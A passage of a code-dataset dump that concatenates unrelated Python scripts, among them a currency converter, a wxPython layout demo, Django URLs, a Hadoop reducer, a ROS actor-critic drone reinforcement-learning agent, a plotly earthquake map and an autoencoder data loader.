Please check your abbreviation of the currency and rerun this program!\"\n numlist=[]\n orderlist=[]\n amttolist=[]\n amount_to=\"\"\n webname=\"http://cs1110.cs.cornell.edu/2016fa/a1server.php?from=\"\n website=webname+currency_from+\"&to=\"+currency_to+\"&amt=\"+str(amount_from)\n doc = urlopen(website)\n docstr = doc.read()\n doc.close()\n jstr = docstr.decode('ascii')\n jstr = list(jstr)\n for s in range(len(jstr)-5):\n if jstr[s]==errorlist[0]and jstr[s+1]==errorlist[1]and jstr[s+2]==errorlist[2]and jstr[s+3]==errorlist[3]and jstr[s+4]==errorlist[4]:\n return wrong\n else:\n continue\n for i in range(len(jstr)):\n if jstr[i] in \"1234567890\":\n numlist.append(jstr[i])\n orderlist.append(i)\n for j in range(len(orderlist)-1):\n if orderlist[j]+1==orderlist[j+1] or orderlist[j]+2==orderlist[j+1]:\n continue\n else:\n orderorigin=orderlist[j+1]\n orderoforderorigin=j+1\n for s in range(j+1,len(orderlist),1):\n amttolist.append(numlist[s])\n for i in range(orderoforderorigin,len(orderlist)-1,1): \n if orderlist[i]+2==orderlist[i+1]:\n orderofpoint=i+1-orderoforderorigin\n amttolist.insert(orderofpoint,\".\")\n for h in range(len(amttolist)):\n amount_to=amount_to+amttolist[h]\n amount_to=float(amount_to)\n return amount_to\n\n\ndef test_exchange():\n \"\"\"text if the function 'exchange' is all right\"\"\"\n assert(exchange(\"USD\",\"EUR\",8.3842)==7.026756099)\n\ndef testAll():\n \"\"\"text all the functions\"\"\"\n test_exchange()\n print(\"All tests passed\")\n\ndef main():\n print(\"Welcome!\")\n testAll()\n cf=input(\"Please enter the abbreviation of your current currency:\")\n ct=input(\"Please enter the abbreviation of your target currency:\")\n af=float(input(\"Please enter the amount of your current currency:\"))\n result=exchange(cf,ct,af)\n if type(result)==type(2.00):\n print(\"The result is:%r\" % result +\" \"+ct)\n print(\"Thanks for using this service!\")\n elif type(result)==type(\"Right\"):\n print (result)\n\n\nif __name__==\"__main__\":\n main()\n","sub_path":"pyassign2/currency.py","file_name":"currency.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"413260962","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n#-----------------------------------------------------------------------------\n# Purpose: Basic grid sizer.\n#-----------------------------------------------------------------------------\n\nimport wx\nfrom blockwindow import BlockWindow\n\nlabels = ['one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine']\n\nclass GridSizerFrame(wx.Frame):\n\n def __init__(self):\n super(self.__class__, self).__init__(parent=None, id=-1, title='Basic Grid Sizer')\n sizer = wx.GridSizer(rows=3, cols=3, hgap=5, vgap=5)\n\n for label in labels:\n bw = BlockWindow(parent=self, label=label)\n sizer.Add(item=bw, proportion=0, flag=0, border=0)\n\n self.SetSizer(sizer)\n self.Fit()\n\nclass GridSizerApp(wx.App):\n\n def OnInit(self):\n frame = GridSizerFrame()\n frame.Show()\n self.SetTopWindow(frame)\n return True\n\nif __name__ == '__main__':\n\n app = GridSizerApp()\n app.MainLoop()\n\n\n\n","sub_path":"sizer/basic_grid_sizer_1.py","file_name":"basic_grid_sizer_1.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"224320614","text":"import sys\n\ndef check_anagram(w1, w2):\n\tfor letter in w1:\n\t\tif letter in w2:\n\t\t\tw2 = w2.replace(letter, '', 
1)\n\t\telse:\n\t\t\treturn False\n\n\tif w2 == \"\":\n\t\treturn True\n\telse:\n\t\treturn False\n\nfor line in sys.stdin:\n\twords = line.strip().split()\n\tprint(check_anagram(words[0], words[1]))\n","sub_path":"z_only_python/anagram_21.py","file_name":"anagram_21.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"356504663","text":"from django.urls import path, include\nfrom . import views\nfrom django.contrib.auth.views import LoginView, LogoutView\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"testing\", views.testing, name=\"testing\"),\n path(\"signup\", views.signup, name=\"signup\"),\n path(\"login\", LoginView.as_view(), name=\"login\"),\n path(\"profile\", views.profile, name=\"profile\"),\n path(\"logout\", LogoutView.as_view(), name=\"logout\"),\n]","sub_path":"login/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"376988481","text":"#!/usr/bin/python3\n\nimport sys\n\noldKey = None\nurlTotalUIDs = 0\n\nfor line in sys.stdin:\n data = line.strip().split(\"\\t\")\n\n if len(data) != 2:\n continue\n\n thisKey, uid = data\n\n if oldKey and thisKey != oldKey:\n print(\"{0}\\t{1}\".format(oldKey, urlTotalUIDs))\n urlTotalUIDs = 0\n \n urlTotalUIDs += 1\n oldKey = thisKey\n\nif oldKey != None:\n print(\"{0}\\t{1}\".format(thisKey, urlTotalUIDs))\n","sub_path":"lab2-super/reducer.py","file_name":"reducer.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"552182329","text":"# podmd\n# Script to read yml files and write an ods spreadsheet for mapping codes\n# end_podmd\n\nimport yaml\nimport os\nimport collections\nfrom pyexcel_ods import save_data\n\nmapp = []\nmapp.append(['diagnosistext']+['icdmorphologycode']+['icdmorphology']+['icdtopographycode']+['icdtopography']+['ncit:term']+['ncit:code'])\nyamldir = '../current/'\nodsdir = '../editing/'\nfor filename in os.listdir(yamldir): # Specify directory\n if filename.endswith(\"yaml\"):\n yamlfile = yamldir + filename\n with open(yamlfile, \"r\") as stream:\n data = yaml.load(stream)\n #print data\n try:\n diagnosis = [data['examples'][0]['labels']]\n icdom_c = [data['input'][0]['id'].replace('icdom-','')]\n icdom = [data['input'][0]['label']]\n icdot_c = [data['input'][1]['id'].replace('icdot-','')]\n icdot = [data['input'][1]['label']]\n #seer = [data['equivalents'][1]['id'].replace('seer:','')]\n ncit = [data['equivalents'][0]['label']]\n ncit_c = [data['equivalents'][0]['id'].replace(\"ncit:\",\"\")]\n mapp.append(diagnosis+icdom_c+icdom+icdot_c+icdot+seer+ncit+ncit_c)\n except:\n pass\n\n#print mapp\n\nmapping = collections.OrderedDict()\n\nsheetx = {\"codes\":mapp}\nsave_data(odsdir + \"table_from_yaml.ods\",sheetx)\n","sub_path":"tools/yaml_to_ods.py","file_name":"yaml_to_ods.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"562161537","text":"#!/usr/bin/env python\nfrom __future__ import print_function, division\n\nimport roslib\nimport random\nroslib.load_manifest('actor_critic_agent')\nimport sys\nimport rospy\nimport numpy as np\nfrom scipy import signal\nimport cv2\nfrom sensor_msgs.msg import Image, Imu, LaserScan\nfrom geometry_msgs.msg import Twist\nfrom gazebo_msgs.msg import 
ModelState, ModelStates, ContactsState\nfrom ardrone_autonomy.msg import Navdata\nfrom std_msgs.msg import Empty\nfrom cv_bridge import CvBridge, CvBridgeError\nimport time\nimport os\nfrom collections import deque\nfrom tf.transformations import quaternion_from_euler\nimport json\nfrom numpy import inf\n\nfrom keras.models import Model\nfrom keras.preprocessing.image import img_to_array, load_img\nfrom autoencoder import autoencoder_network\nimport tensorflow as tf\nfrom keras import backend as K\n\nfrom ReplayBuffer import ReplayBuffer\nfrom ActorNetwork import ActorNetwork\nfrom CriticNetwork import CriticNetwork\nfrom OU import OU\n\n\nclass actor_critic:\n\n def __init__(self): \n random.seed()\n \n self.colliding_flag = False\n \n # Set to 1 to activate training and to 0 to deactivate (reading from a ros parameter)\n self.train_indicator = rospy.get_param('~training')\n \n # Reading the networks' path from a ros parameter\n self.networks_dir = rospy.get_param('~networks_dir')\n \n # Reading the input modality from a ros parameter (laser or camera)\n self.input_mode = rospy.get_param('~input')\n \n # Set to 1 to activate imu inputs and to 0 to deactivate (reading from a ros parameter)\n self.imu_input_mod = rospy.get_param('~imu_input')\n \n self.queue = deque([])\n \n self.graph = tf.get_default_graph() \n \n if self.imu_input_mod == 1:\n self.imu_dim = 37\n else:\n self.imu_dim = 0\n if self.input_mode == \"laser\":\n self.feature_dim = 9\n self.aruco_dim = 3\n self.altitude_dim = 1\n else:\n self.feature_dim = 200\n self.aruco_dim = 0\n self.altitude_dim = 0\n self.state_dim = (3 * self.feature_dim) + self.imu_dim + self.aruco_dim + self.altitude_dim\n self.action_dim = 3\n self.buffer_size = 100000\n self.batch_size = 32\n self.gamma = 0.99\n self.tau = 0.001 #Target Network HyperParameters\n self.lra = 0.0001 #Learning rate for Actor\n self.lrc = 0.001 #Lerning rate for Critic\n self.epsilon = 1\n \n self.ou = OU()\n \n # Initialization of state, action and noise vectors\n self.action = np.zeros((1, self.action_dim))\n self.action_noise = np.zeros((1, self.action_dim))\n self.state = np.zeros(self.state_dim)\n \n with self.graph.as_default():\n # Initialization of the autoencoder network\n self.autoencoder_network = autoencoder_network(self.networks_dir)\n #Tensorflow GPU optimization\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n sess = tf.Session(config=config)\n K.set_session(sess)\n # Initialization of the actor and critic networks\n self.actor = ActorNetwork(sess, self.state_dim, self.action_dim, self.batch_size, self.tau, self.lra)\n self.critic = CriticNetwork(sess, self.state_dim, self.action_dim, self.batch_size, self.tau, self.lrc) \n #Now load the weight\n rospy.loginfo(\"Now we load the weight\")\n try:\n self.actor.model.load_weights(self.networks_dir + \"actormodel.h5\")\n self.critic.model.load_weights(self.networks_dir + \"criticmodel.h5\")\n self.actor.target_model.load_weights(self.networks_dir + \"actormodel.h5\")\n self.critic.target_model.load_weights(self.networks_dir + \"criticmodel.h5\")\n rospy.loginfo(\"Weight load successfully\")\n except:\n rospy.logwarn(\"Cannot find the weight\")\n \n #Create replay buffer\n self.buff = ReplayBuffer(self.buffer_size)\n \n self.aruco_limit = 4.0\n self.altitude_limit = 2.0\n self.imu_msg = np.zeros(self.imu_dim)\n self.bumper_msg = None\n self.navdata_msg = None\n self.aruco_msg = None\n self.laser_msg = None\n self.model_states_pose_msg = None \n self.count = 0\n self.step = 0\n self.bridge = 
CvBridge()\n\n actual_time = rospy.get_rostime()\n self.start_time = actual_time.secs + \\\n actual_time.nsecs / 1000000000\n \n self.start_pos = Twist()\n self.start_pos.linear.x = 0.0\n self.start_pos.linear.y = 0.0\n self.start_pos.linear.z = 0.0\n \n self.total_reward = 0.0\n \n self.position_list = [[0, 0], [20, 0], [20, -20], [0, -20]]\n \n # Subscribers initialization\n self.image_sub = rospy.Subscriber(\"/ardrone/front/image_raw\",\n Image, self.callback_image)\n self.imu_sub = rospy.Subscriber(\"/ardrone/imu\",\n Imu, self.callback_imu)\n self.bumper_sub = rospy.Subscriber(\"/ardrone/bumper\",\n ContactsState, self.callback_bumper)\n self.navdata_sub = rospy.Subscriber(\"/ardrone/navdata\",\n Navdata, self.callback_navdata)\n self.aruco_sub = rospy.Subscriber(\"/ardrone/aruco/pose\",\n Twist, self.callback_aruco)\n self.model_states_sub = rospy.Subscriber(\"/gazebo/model_states\",\n ModelStates, self.callback_model_states)\n self.laser_sub = rospy.Subscriber(\"/ardrone/laser\",\n LaserScan, self.callback_laser)\n \n rospy.loginfo(\"Subscribers initialized\")\n \n # Publishers initialization\n self.model_state_pub = rospy.Publisher('/gazebo/set_model_state', ModelState, queue_size=10)\n self.reset_pub = rospy.Publisher('/ardrone/reset', Empty, queue_size=10)\n self.takeoff_pub = rospy.Publisher('/ardrone/takeoff', Empty, queue_size=10)\n self.land_pub = rospy.Publisher('/ardrone/land', Empty, queue_size=10)\n self.cmd_vel_pub = rospy.Publisher('/cmd_vel', Twist, queue_size=10)\n \n rospy.loginfo(\"Publishers initialized\")\n \n # Small sleep to give time to publishers to open the topics\n rospy.sleep(0.5) \n \n rospy.loginfo(\"taking off\")\n self.takeoff_pub.publish(Empty())\n\n def callback_image(self,data):\n if (self.navdata_msg != None and \\\n self.navdata_msg.state == 3): # The actor-critic system works only when the drone is flying\n \n rospy.logdebug(\"Episode : \" + str(self.count) + \" Replay Buffer \" + str(self.buff.count())) \n \n loss = 0\n\n # Rmoving inf from laser ranges\n if self.laser_msg != None:\n laser_ranges = np.asarray(self.laser_msg.ranges)\n laser_ranges[laser_ranges == inf] = 0\n \n # Calculating laser punishment\n laser_cost = 0.0\n if self.laser_msg != None:\n inverted_ranges = 1 - (laser_ranges / self.laser_msg.range_max)\n gaussian_ranges = np.multiply(inverted_ranges, signal.gaussian(self.feature_dim, (self.feature_dim / 2 * 0.8)))\n laser_cost = -np.sum(gaussian_ranges) / self.feature_dim\n rospy.loginfo(\"Laser range punishment: \" + str(laser_cost))\n \n # Calculating the punishment for colliding\n is_colliding = False\n collision_cost = 0.0\n if self.colliding_flag:\n is_colliding = True\n collision_cost = -10.0\n rospy.logdebug(\"Collisions punishment: \" + str(collision_cost))\n \n # Calculating the time elapsed from the last respawn\n actual_time = rospy.get_rostime() \n time_stamp = actual_time.secs + \\\n actual_time.nsecs / 1000000000 \n time_elapsed = time_stamp - self.start_time\n rospy.logdebug(\"Time elapsed: \" + str(time_elapsed))\n \n # Calculating the aruco distance reward\n aruco_dist = 0.0\n aruco_cost = 0.0 \n if self.aruco_msg != None:\n aruco_dist = np.sqrt(self.aruco_msg.linear.x**2 + \\\n self.aruco_msg.linear.y**2 + \\\n self.aruco_msg.linear.z**2)\n if aruco_dist == 0.0 or aruco_dist > self.aruco_limit:\n aruco_dist = self.aruco_limit\n aruco_cost = 1.0 - (aruco_dist / self.aruco_limit)\n rospy.logdebug(\"Aruco distance reward: \" + str(aruco_cost))\n \n # Calculating the traveled distance reward and the altitude 
punishment\n            trav_dist = 0.0\n            trav_cost = 0.0  # initialize so step_reward is defined even without a pose message\n            alt_cost = 0.0\n            if self.model_states_pose_msg != None:\n                actual_pos = self.model_states_pose_msg.position\n                trav_dist = np.sqrt((actual_pos.x - self.start_pos.linear.x)**2 + \\\n                                    (actual_pos.y - self.start_pos.linear.y)**2)\n                trav_cost = trav_dist / time_elapsed\n                alt_cost = -abs(1 - actual_pos.z)\n                rospy.logdebug(\"Travel distance reward: \" + str(trav_cost))\n            \n            # Calculating the angular velocity punishment\n            angular_cost = 0\n            if self.imu_msg != None:\n                angular_cost = -abs(self.imu_msg[6])\n            rospy.loginfo(\"Angular punishment: \" + str(angular_cost))\n            \n            # Calculating the step reward\n            step_reward = collision_cost + \\\n                          (10 * aruco_cost) + \\\n                          trav_cost + alt_cost \\\n                          + laser_cost #+ angular_cost\n            rospy.logdebug(\"Step reward: \" + str(step_reward))\n            \n            # Calculating the total reward\n            self.total_reward += step_reward\n            rospy.logdebug(\"Total reward: \" + str(self.total_reward))\n            \n            image_features = np.zeros(self.feature_dim)\n            if self.input_mode == \"camera\":\n                rospy.logwarn(self.input_mode + \" CAMERA\")\n                # Reading the camera image from the topic\n                try:\n                    cv_image = self.bridge.imgmsg_to_cv2(data, \"bgr8\")\n                except CvBridgeError as err:\n                    rospy.logerr(err)  # rospy's error-level logger is logerr, not logerror\n                \n                # Resizing the image to 160x80 pixel for the convolutional network\n                cv_image_resized = cv2.resize(cv_image, (160, 80))\n                #array_image = np.asarray(cv_image_resized)\n                array_image = img_to_array(cv_image_resized)\n                input_image = np.zeros((1, 80, 160, 3))\n                input_image[0] = array_image\n                input_image /= 255.0\n                \n                # Calculating image features\n                with self.graph.as_default():\n                    image_features = self.autoencoder_network.run_network(input_image)\n            elif self.laser_msg != None:\n                rospy.logwarn(self.input_mode + \" LASER\")\n                # Reading laser data as state features\n                image_features = laser_ranges / self.laser_msg.range_max \n            \n            # Adding the features to the features list\n            if len(self.queue) == 0:\n                self.queue.append(image_features)\n                self.queue.append(image_features)\n                self.queue.append(image_features)\n            else:\n                self.queue.popleft()\n                self.queue.append(image_features)\n            \n            rospy.logdebug(\"Queue length: \" + str(len(self.queue)))\n            rospy.logdebug(\"Image Features: \" + str(image_features.shape))\n            rospy.logdebug(\"Imu length: \" + str(len(self.imu_msg)))\n            \n            # Create the state vector\n            new_state = np.concatenate((self.queue[0].flatten(), \n                                        self.queue[1].flatten(),\n                                        self.queue[2].flatten()))\n            if self.imu_input_mod == 1:\n                new_state = np.concatenate((new_state,\n                                            self.imu_msg))\n            if self.input_mode == \"laser\":\n                # Creating aruco features\n                aruco_features = np.zeros(self.aruco_dim)\n                if self.aruco_msg != None:\n                    if self.aruco_msg.linear.x == 0 or self.aruco_msg.linear.x > self.aruco_limit:\n                        aruco_features[0] = 1.0\n                    else:\n                        aruco_features[0] = self.aruco_msg.linear.x / self.aruco_limit\n                    if self.aruco_msg.linear.y == 0 or self.aruco_msg.linear.y > self.aruco_limit:\n                        aruco_features[1] = 1.0\n                    else:\n                        aruco_features[1] = self.aruco_msg.linear.y / self.aruco_limit\n                    if self.aruco_msg.linear.z == 0 or self.aruco_msg.linear.z > self.aruco_limit:  # was .y in the z branch, a copy-paste slip\n                        aruco_features[2] = 1.0\n                    else:\n                        aruco_features[2] = self.aruco_msg.linear.z / self.aruco_limit\n                    #aruco_features[3] = self.aruco_msg.angular.x / np.pi\n                    #aruco_features[4] = self.aruco_msg.angular.y / np.pi\n                    #aruco_features[5] = self.aruco_msg.angular.z / np.pi\n                \n                # Creating altitude feature \n                altitude_feature = np.zeros(1) \n                if self.model_states_pose_msg != None:\n                    altitude_value = self.model_states_pose_msg.position.z\n                    if altitude_value > 
self.altitude_limit:\n altitude_feature[0] = 1.0\n else:\n altitude_feature[0] = altitude_value / self.altitude_limit\n new_state = new_state = np.concatenate((new_state,\n aruco_features,\n altitude_feature))\n \n rospy.logdebug(\"State length: \" + str(len(new_state)))\n rospy.loginfo(\"State: \" + str(new_state))\n \n # Add replay buffer\n done = False\n if is_colliding or \\\n (aruco_cost > 0.8):\n done = True\n self.buff.add(self.state, self.action[0], step_reward, new_state, done)\n \n # Calculating new action\n with self.graph.as_default():\n a_t_original = self.actor.model.predict(new_state.reshape(1, new_state.shape[0]))\n self.action_noise[0][0] = self.train_indicator * max(self.epsilon, 0) * \\\n self.ou.function(a_t_original[0][0], 0.3, 0.5, 0.1)\n self.action_noise[0][1] = self.train_indicator * max(self.epsilon, 0) * \\\n self.ou.function(a_t_original[0][1], 0.0, 0.5, 0.1)\n self.action_noise[0][2] = self.train_indicator * max(self.epsilon, 0) * \\\n self.ou.function(a_t_original[0][2], 0.0, 0.5, 0.1)\n\n self.action[0][0] = a_t_original[0][0] + self.action_noise[0][0]\n self.action[0][1] = a_t_original[0][1] + self.action_noise[0][1]\n self.action[0][2] = a_t_original[0][2] + self.action_noise[0][2]\n# with self.graph.as_default():\n# a_t_original = self.actor.model.predict(new_state.reshape(1, new_state.shape[0]))\n# self.action_noise[0][0] = self.train_indicator * max(self.epsilon, 0) * \\\n# self.ou.function(a_t_original[0][0], 0.3, 0.6, 0.1)\n# self.action_noise[0][1] = self.train_indicator * max(self.epsilon, 0) * \\\n# self.ou.function(a_t_original[0][1], 0.0, 0.5, 0.1)\n# self.action_noise[0][2] = self.train_indicator * max(self.epsilon, 0) * \\\n# self.ou.function(a_t_original[0][2], 0.0, 0.9, 0.1)\n# self.action_noise[0][3] = self.train_indicator * max(self.epsilon, 0) * \\\n# self.ou.function(a_t_original[0][3], 0.0, 0.5, 0.1)\n#\n# self.action[0][0] = a_t_original[0][0] + self.action_noise[0][0]\n# self.action[0][1] = a_t_original[0][1] + self.action_noise[0][1]\n# self.action[0][2] = a_t_original[0][2] + self.action_noise[0][2]\n# self.action[0][3] = a_t_original[0][3] + self.action_noise[0][3]\n \n rospy.loginfo(\"motor comand plus noise: \" + str( self.action[0][2]) + \\\n \" original motor command: \" + str(a_t_original[0][2]) + \\\n \" noise: \" + str(self.action_noise[0][2]))\n\n # Perform an action\n cmd_input = Twist()\n# cmd_input.linear.x = self.action[0][0]\n# cmd_input.linear.y = self.action[0][1]\n# cmd_input.linear.z = self.action[0][2]\n# cmd_input.angular.z = self.action[0][3]\n cmd_input.linear.x = self.action[0][0]\n cmd_input.linear.y = 0.0\n cmd_input.linear.z = self.action[0][1]\n # CAMBIO TEST MOMENTANEOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO\n# if abs(a_t_original[0][2]) > 0.7:\n# self.action[0][2] = 0.0\n cmd_input.angular.z = self.action[0][2]\n self.cmd_vel_pub.publish(cmd_input)\n \n # Updating the state\n self.state = new_state\n \n #Do the batch update\n batch = self.buff.getBatch(self.batch_size)\n states = np.asarray([e[0] for e in batch])\n actions = np.asarray([e[1] for e in batch])\n rewards = np.asarray([e[2] for e in batch])\n new_states = np.asarray([e[3] for e in batch])\n dones = np.asarray([e[4] for e in batch])\n y_t = np.asarray([e[1] for e in batch])\n\n # Calculating Q value \n with self.graph.as_default():\n target_q_values = self.critic.target_model.predict([new_states, self.actor.target_model.predict(new_states)]) \n \n for k in range(len(batch)):\n if dones[k]:\n y_t[k] = 
rewards[k]\n else:\n y_t[k] = rewards[k] + self.gamma * target_q_values[k]\n \n # Training the network\n with self.graph.as_default():\n if (self.train_indicator):\n loss += self.critic.model.train_on_batch([states, actions], y_t) \n a_for_grad = self.actor.model.predict(states)\n grads = self.critic.gradients(states, a_for_grad)\n self.actor.train(states, grads)\n self.actor.target_train()\n self.critic.target_train()\n \n rospy.logdebug(\"Episode: \" + str(self.count) + \\\n \" Step: \" + str(self.step) + \\\n \" Action: \" + str(self.action) + \\\n \" Reward: \" + str(step_reward) + \\\n \" Loss: \" + str(loss))\n \n self.step +=1\n \n # Starting a newe episode if the drone collide with something or if it's close enough to an aruco board\n if is_colliding or \\\n (aruco_cost > 0.8):\n model_state_msg = ModelState()\n empty_msg = Empty()\n \n # Generating a new random position chosen between 4\n new_position = random.sample(self.position_list, 1)\n \n # Generating a random orientation\n angle = random.random() * 2 * np.pi\n \n rospy.loginfo(\"New position: \" + str(new_position) + \\\n \"New angle: \" + str(angle))\n \n # Creating the model state message to send to set_model_space topic\n model_state_msg.model_name = \"quadrotor\"\n model_state_msg.pose.position.x = new_position[0][0]\n model_state_msg.pose.position.y = new_position[0][1]\n model_state_msg.pose.position.z = 0.0\n quaternion = quaternion_from_euler(0, 0, angle)\n model_state_msg.pose.orientation.x = quaternion[0]\n model_state_msg.pose.orientation.y = quaternion[1]\n model_state_msg.pose.orientation.z = quaternion[2]\n model_state_msg.pose.orientation.w = quaternion[3]\n model_state_msg.reference_frame = \"world\"\n \n self.start_pos.linear.x = new_position[0][0]\n self.start_pos.linear.y = new_position[0][1]\n self.start_pos.linear.z = 0.0\n \n # Reseting the episode starting time\n actual_time = rospy.get_rostime()\n self.start_time = actual_time.secs + \\\n actual_time.nsecs / 1000000000\n # Reseting the image queue\n self.queue = deque([])\n # Reseting state, action and noise vectors\n self.action = np.zeros((1, self.action_dim))\n self.action_noise = np.zeros((1, self.action_dim))\n self.state = np.zeros(self.state_dim)\n \n # Saving the weights\n with self.graph.as_default():\n if (self.train_indicator):\n rospy.loginfo(\"Saving the weights\")\n self.actor.model.save_weights(self.networks_dir + \"actormodel.h5\", overwrite=True)\n with open(self.networks_dir + \"actormodel.json\", \"w\") as outfile:\n json.dump(self.actor.model.to_json(), outfile)\n \n self.critic.model.save_weights(self.networks_dir + \"criticmodel.h5\", overwrite=True)\n with open(self.networks_dir + \"criticmodel.json\", \"w\") as outfile:\n json.dump(self.critic.model.to_json(), outfile)\n\n rospy.loginfo(\"TOTAL REWARD @ \" + str(self.count) +\"-th Episode : Reward \" + str(self.total_reward))\n rospy.loginfo(\"Total Step: \" + str(self.step))\n self.total_reward = 0.0\n self.count += 1\n self.step = 0\n \n # reset the actions\n cmd_input.linear.x = 0.0\n cmd_input.linear.y = 0.0\n cmd_input.linear.z = 0.0\n cmd_input.angular.z = 0.0\n self.cmd_vel_pub.publish(cmd_input)\n \n # Reinitializing position, orientation and status of the drone\n self.land_pub.publish(empty_msg)\n self.model_state_pub.publish(model_state_msg)\n self.reset_pub.publish(empty_msg)\n rospy.sleep(0.5)\n self.takeoff_pub.publish(empty_msg)\n rospy.sleep(0.5)\n self.colliding_flag = False\n \n\n def callback_imu(self,data):\n time_stamp = data.header.stamp.secs + \\\n 
data.header.stamp.nsecs / 1000000000\n \n orientation = np.zeros(4)\n orientation[0] = data.orientation.x\n orientation[1] = data.orientation.y\n orientation[2] = data.orientation.z\n orientation[3] = data.orientation.w\n \n angular_velocity = np.zeros(3)\n angular_velocity[0] = data.angular_velocity.x\n angular_velocity[1] = data.angular_velocity.y\n angular_velocity[2] = data.angular_velocity.z\n \n linear_acceleration = np.zeros(3)\n linear_acceleration[0] = data.linear_acceleration.x / 10\n linear_acceleration[1] = data.linear_acceleration.y / 10\n # Normalizing the compensation for the gravity in z\n linear_acceleration[2] = data.linear_acceleration.z / 10 \n \n self.imu_msg = np.concatenate((orientation, \n angular_velocity,\n linear_acceleration,\n data.orientation_covariance,\n data.angular_velocity_covariance,\n data.linear_acceleration_covariance))\n \n def callback_bumper(self,data): \n self.bumper_msg = data\n if self.bumper_msg.states != []:\n self.colliding_flag = True\n \n def callback_navdata(self,data): \n # 0: Unknown, 1: Init, 2: Landed, 3: Flying, 4: Hovering, 5: Test\n # 6: Taking off, 7: Goto Fix Point, 8: Landing, 9: Looping\n # Note: 3,7 seems to discriminate type of flying (isFly = 3 | 7) \n self.navdata_msg = data\n \n def callback_aruco(self,data): \n self.aruco_msg = data\n \n def callback_laser(self,data): \n self.laser_msg = data\n \n def callback_model_states(self,data):\n is_there = -1\n for i in range(len(data.name)):\n if data.name[i] == \"quadrotor\":\n is_there = i\n\n if is_there >= 0:\n self.model_states_pose_msg = data.pose[is_there]\n else:\n self.model_states_pose_msg = None \n \ndef main(args):\n #cv2.startWindowThread()\n #cv2.namedWindow(\"Image window\")\n rospy.init_node('optical_flow', anonymous=True, log_level=rospy.INFO)\n \n ac = actor_critic()\n time.sleep(1)\n \n rospy.loginfo(\"<------Data recorder (Author: Nino Cauli)------>\")\n \n try:\n rospy.spin()\n except KeyboardInterrupt:\n print(\"Shutting down\") \n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n main(sys.argv)\n","sub_path":"actor_critic_agent/src/actor_critic_agent.py","file_name":"actor_critic_agent.py","file_ext":"py","file_size_in_byte":24303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"564546949","text":"import pandas as pd\nimport mwparserfromhell\nimport json_lines\nimport os,sys\n\nthis_filename = sys.argv[0]\nthis_abs_path = os.path.abspath(this_filename)\ncwd = os.path.abspath(this_filename+\"/..\")\n\njson_filename = cwd+\"/solved.jsonl\"\n\ndatalist = []\n\nwith open(json_filename, 'rb') as f: # opening file in binary(rb) mode \n for idx,item in enumerate(json_lines.reader(f)):\n print(\">> \",idx,\" | \",item['pageTitle'])\n POV_wikicode = mwparserfromhell.parse(item['povVersion'])\n POV_text = POV_wikicode.strip_code()\n SPOV_wikicode = mwparserfromhell.parse(item['solvedpovVersion'])\n SPOV_text = SPOV_wikicode.strip_code()\n datalist.append([POV_text,'POV'])\n datalist.append([SPOV_text,'SPOV'])\n\ndf = pd.DataFrame(datalist, columns = ['body','label'])\ndf.to_csv(cwd+\"/data.csv\", index = False)\n","sub_path":"data/format_wiki_data.py","file_name":"format_wiki_data.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"638205208","text":"#!/usr/bin/python3\n# analyze_earthquakes.py\n\nimport json\n\nfrom plotly.graph_objs import Scattergeo, Layout\nfrom plotly import offline\n\n# Load the 
data.\nmags, titles, lons, lats = [], [], [], []\nwith open('data/eq_data_30_day_m1.json') as f:\n data = json.load(f)\n\n for earthquake in data['features']:\n try:\n mags.append(earthquake['properties']['mag'])\n titles.append(earthquake['properties']['title'])\n lon, lat, _ = earthquake['geometry']['coordinates']\n lons.append(lon)\n lats.append(lat)\n except:\n print(f'failed to parse: {earthquake}')\n\n# Draw a map of the earthquakes.\noffline.plot(\n {\n 'data': [\n {\n 'type': 'scattergeo',\n 'lon': lons,\n 'lat': lats,\n 'text': titles,\n 'marker': {\n 'size': [5 * mag for mag in mags],\n 'color': mags,\n 'colorscale': 'Portland',\n 'colorbar': {\n 'title': 'Magnitude'\n },\n },\n },\n ],\n 'layout':\n Layout(title='Earthquakes'),\n },\n filename='earthquakes_map.html',\n)\n","sub_path":"programming/python/exercises/crash_course/data_visualization/analyze_earthquakes.py","file_name":"analyze_earthquakes.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"287239671","text":"import numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import MinMaxScaler\nimport os\n\nsave_dir = 'autoencoder_pca_30to2/'\nif not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\nfilename = 'anonymized_data.csv'\n\n\ndef get_data():\n print(f'* calling {get_data.__name__}')\n\n df = pd.read_csv(os.path.join(save_dir, filename))\n print(f'=> get dataframe with shape {df.shape}')\n scaler = MinMaxScaler()\n scaled_data = scaler.fit_transform(df.drop('Label', axis=1))\n labels = df['Label']\n print(f'=> inputs shape {scaled_data.shape}')\n print(f'=> labels shape {labels.shape}')\n return scaled_data, labels\n\n\nif __name__ == '__main__':\n\n inputs, labels = get_data()\n\n # constants\n\n num_inputs = 30\n num_hidden = 2\n num_outputs = 